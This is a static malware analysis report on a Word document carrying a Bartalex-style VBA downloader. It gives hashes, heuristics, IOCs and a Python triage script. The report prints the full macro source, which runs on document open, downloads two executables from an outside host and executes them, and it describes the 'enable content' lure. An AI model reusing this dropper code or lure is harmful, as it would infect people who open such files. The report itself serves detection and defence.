Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f39e9d915b5fec46…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 27.6 KB
Created: 2014-12-06 05:47:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2015-09-23
MD5: 62d46d126f6bc8213e9b12a5348b7550
SHA-1: 6a1d6286e12feefaf9ba6a9d810ed3e51e4c5462
SHA-256: f39e9d915b5fec4633c7b7df0eeb3c4822bf67ef4659624b73633be38dd2094b
Risk score: 238

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1105 Ingress Tool Transfer

The document carries a VBA project whose lure text tells the user to enable content, claiming the document is blurred for security. The macro fires from Document_Open and declares URLDownloadToFile (urlmon) and ShellExecute (shell32). For each of four URL/path pairs it downloads the URL to the path and immediately calls ShellExecute on the result, so the first payload is launched before the second is fetched and no return value is ever checked. The two live URLs are 'http://www.net5imarketing.com/new/img/1/explorer.exe' and 'http://www.net5imarketing.com/new/img/1/windows.exe'; the remaining two slots still hold the placeholder string 'DownloadLinkHere', i.e. unused kit slots. The destination paths are built as Environ("APPDATA") & "blah.exe" with no path separator, so on a default profile the files do not land inside %APPDATA% as blah.exe and blah2.exe but beside the Roaming folder, e.g. %USERPROFILE%\AppData\Roamingblah.exe and %USERPROFILE%\AppData\Roamingblah2.exe. Hunt and detection content should use those concatenated names rather than blah.exe under Roaming.

Heuristics 7

  • ClamAV: Doc.Downloader.Bartalex-6755229-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Bartalex-6755229-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    path1 = Environ("APPDATA") & "blah.exe"
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.net5imarketing.com/new/img/1/explorer.exe (Referenced by macro)
    • http://www.net5imarketing.com/new/img/1/windows.exe (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (Referenced by macro)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (Referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (Referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (Referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (Referenced by macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordml (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (Referenced by macro)
    The extractor labels every entry "Referenced by macro", but the schemas.microsoft.com and schemas.openxmlformats.org entries are OOXML XML namespace URIs declared in every Word document part; they are never contacted at runtime and should not be treated as network indicators. Only the two net5imarketing.com URLs are fetched by the macro.
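The following triage script is an added example, not part of the report's tooling or of the sample, that re-derives the heuristics and the IOC summary above from the carved macros.bas shown under Extracted artifacts. It folds VBA line continuations so multi-line Declares match as one statement, records the declared Win32 imports, flags the same OLE_VBA_DOWNLOAD / OLE_VBA_DOCOPEN / OLE_VBA_ENVIRON conditions, pulls URL literals, spots "url" variables that hold no URL (the kit's unused slots), and resolves every Environ()-built destination against an assumed victim profile (C:\Users\victim\AppData\Roaming, constructed) so the missing path separator surfaces as the real on-disk file name. The AutoOpen alternative in the entry-point check and the url-variable naming convention used for placeholder detection are my additions; the report asserts neither.

```python
"""Re-derive this report's VBA heuristics and IOCs from the carved macro source."""
import re

# Constructed input: the macros.bas body shown in this report (Attribute lines dropped).
VBA_SOURCE = r'''
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
    ByVal szFileName As String, ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long

Private Sub Document_Open()
ChangeNumbers
End Sub

Sub ChangeNumbers()
path1 = Environ("APPDATA") & "blah.exe"
path2 = Environ("APPDATA") & "blah2.exe"
path3 = Environ("appdata") & "blah3.exe"
path4 = Environ("appdata") & "blah4.exe"
url1 = "http://www.net5imarketing.com/new/img/1/explorer.exe"
url2 = "http://www.net5imarketing.com/new/img/1/windows.exe"
url3 = "DownloadLinkHere"
url4 = "DownloadLinkHere"
ChangeText url1, path1
ChangeText url2, path2
ChangeText url3, path3
ChangeText url4, path4
End
End Sub

Sub ChangeText(ByVal a, b As String)
URLDownloadToFile 0, a, b, 0, 0
ShellExecute 0, "open", b, "", vbNullString, vbNormalFocus
End Sub
'''

# Assumed victim environment (constructed) used to resolve Environ() expressions.
FAKE_ENV = {"APPDATA": r"C:\Users\victim\AppData\Roaming"}

DECLARE_RE = re.compile(r'\bDeclare\s+(?:PtrSafe\s+)?Function\s+(\w+)\s+Lib\s+"([^"]+)"', re.I)
# Entry points: Document_Open is what this sample uses; AutoOpen is my addition.
DOCOPEN_RE = re.compile(r'^\s*(?:Private\s+|Public\s+)?Sub\s+(Document_Open|AutoOpen)\s*\(', re.I | re.M)
ENVIRON_RE = re.compile(r'^\s*(\w+)\s*=\s*Environ\s*\(\s*"(\w+)"\s*\)\s*&\s*"([^"]*)"', re.I | re.M)
URL_RE = re.compile(r'"(https?://[^"\s]+)"', re.I)
URLVAR_RE = re.compile(r'^\s*(\w*url\w*)\s*=\s*"([^"]*)"\s*$', re.I | re.M)


def join_continuations(src):
    """Fold VBA ' _' line continuations so a multi-line Declare is one statement."""
    return re.sub(r'[ \t]+_[ \t]*\r?\n[ \t]*', ' ', src)


def triage(src, env=FAKE_ENV):
    src = join_continuations(src)
    declares = {name: lib.lower() for name, lib in DECLARE_RE.findall(src)}

    heuristics = set()
    if any(n.lower() == "urldownloadtofile" for n in declares):
        heuristics.add("OLE_VBA_DOWNLOAD")
    if DOCOPEN_RE.search(src):
        heuristics.add("OLE_VBA_DOCOPEN")
    if re.search(r'\bEnviron\s*\(', src, re.I):
        heuristics.add("OLE_VBA_ENVIRON")

    urls = list(dict.fromkeys(URL_RE.findall(src)))  # order-preserving de-dup
    # Variables named like a URL but holding a non-URL literal: unfinished kit slots.
    placeholders = [(v, s) for v, s in URLVAR_RE.findall(src)
                    if not s.lower().startswith("http")]

    drop_paths = []
    for var, key, suffix in ENVIRON_RE.findall(src):
        base = env.get(key.upper(), "%" + key.upper() + "%")  # Environ() is case-insensitive
        missing_sep = not suffix.startswith(("\\", "/"))      # no '\' between dir and name
        drop_paths.append((var, base + suffix, missing_sep))

    return {"declares": declares, "heuristics": heuristics, "urls": urls,
            "placeholders": placeholders, "drop_paths": drop_paths}


if __name__ == "__main__":
    for key, value in triage(VBA_SOURCE).items():
        print(key, value)
```

Run as-is to see the four resolved drop paths; each is reported with a missing-separator flag of True, which is the concrete reason a detection looking for blah.exe under %APPDATA% never fires for this sample.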

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 1616 bytes
SHA-256: d0d568490bc02fa28d0a28cd6db9ed1a6d9c1b0565e8501dfd569a280e3aed36
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
    ByVal szFileName As String, ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long

Private Sub Document_Open()
ChangeNumbers
End Sub

Sub ChangeNumbers()
Dim url1 As String, url2 As String, url3 As String, url4 As String, path1 As String, path2 As String, path3 As String, path4 As String
path1 = Environ("APPDATA") & "blah.exe"
path2 = Environ("APPDATA") & "blah2.exe"
path3 = Environ("appdata") & "blah3.exe"
path4 = Environ("appdata") & "blah4.exe"

url1 = "http://www.net5imarketing.com/new/img/1/explorer.exe"
url2 = "http://www.net5imarketing.com/new/img/1/windows.exe"
url3 = "DownloadLinkHere"
url4 = "DownloadLinkHere"


ChangeText url1, path1
ChangeText url2, path2
ChangeText url3, path3
ChangeText url4, path4


End
Exit Sub
End Sub

Sub ChangeText(ByVal a, b As String)
URLDownloadToFile 0, a, b, 0, 0
ShellExecute 0, "open", b, "", vbNullString, vbNormalFocus
Exit Sub
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 10240 bytes
SHA-256: 57cf146e600e6246c108d8c03d15ea2dbe1d0159009bf34854ab2d27f573fa2b
Detection: ClamAV: Doc.Downloader.Bartalex-6755229-0
Obfuscation or payload: unlikely